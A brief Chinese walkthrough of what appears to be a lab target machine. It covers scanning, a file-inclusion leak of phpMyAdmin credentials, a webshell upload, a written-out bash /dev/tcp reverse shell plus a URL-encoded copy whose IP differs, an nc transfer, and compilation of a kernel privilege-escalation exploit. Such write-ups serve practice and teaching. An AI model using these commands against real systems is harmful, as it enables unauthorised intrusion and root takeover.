点击查看作者原文链接
target IP:不详
1.
先使用nmap扫描局域网内cunhuoz主机,进行排查
排查后的到靶机IP为192.168.171.154
使用dirb扫描目录
逐个进行排查,
发现使用phpmyadmin管理数据库
发现192.168.171.154/in页面为phpinfo,搜索www找到绝对路径
发现192.168.171.154/test页面中可能存在文件包含漏洞
尝试下载phpmyadmin配置文件
无法下载,改为POST请求
下载成功,打开发现root及其密码
得到root密码,进行SSH连接,
成功!getshell
2.
用burp抓包 c.php时,发现数据库账号密码
尝试登录phpmyadmin
登陆成功,发现phpmyadmin版本号3.4.7
searchsploit phpmyadmin 3.4发现可利用的POC
在phmyadmin中查看web账号密码
登录web页面,查看功能,发现有上传,尝试上传木马
图片马成功
上面审计panel.php中,也发现文件包含漏洞,可以传一个load
解析13.jpg,cmd赋值whoami,执行成功
发现用户身份为wwwdata,权限不足,开始写入反弹shell,进行提权
kali开启监听
反弹shell命令,直接输入尝试不行,需要URL编码一下
echo “bash -i >& /dev/tcp/192.168.171.157/4444 >&1” | bash
%65%63%68%6F%20%22%62%61%73%68%20%2D%69%20%3E%26%20%2F%64%65%76%2F%74%63%70%2F%31%39%32%2E%31%36%38%2E%31%37%31%2E%31%35%36%2F%34%34%34%34%20%30%3E%26%31%22%20%7C%20%62%61%73%68
kali收到
lsb release -a命令无法使用,uname -a查看版本号,搜索相应的提权方式
searchsploit 3.13 找到提权poc
使用nc命令将37292.c传至靶机
kali:nc -q 1 -lp 333 < 37292.c
靶机: nv -nv 192.168.171.156 333 > 37292.c
查看用法
靶机gcc命令进行编译 gcc 37292.c -o exp
执行
获得root权限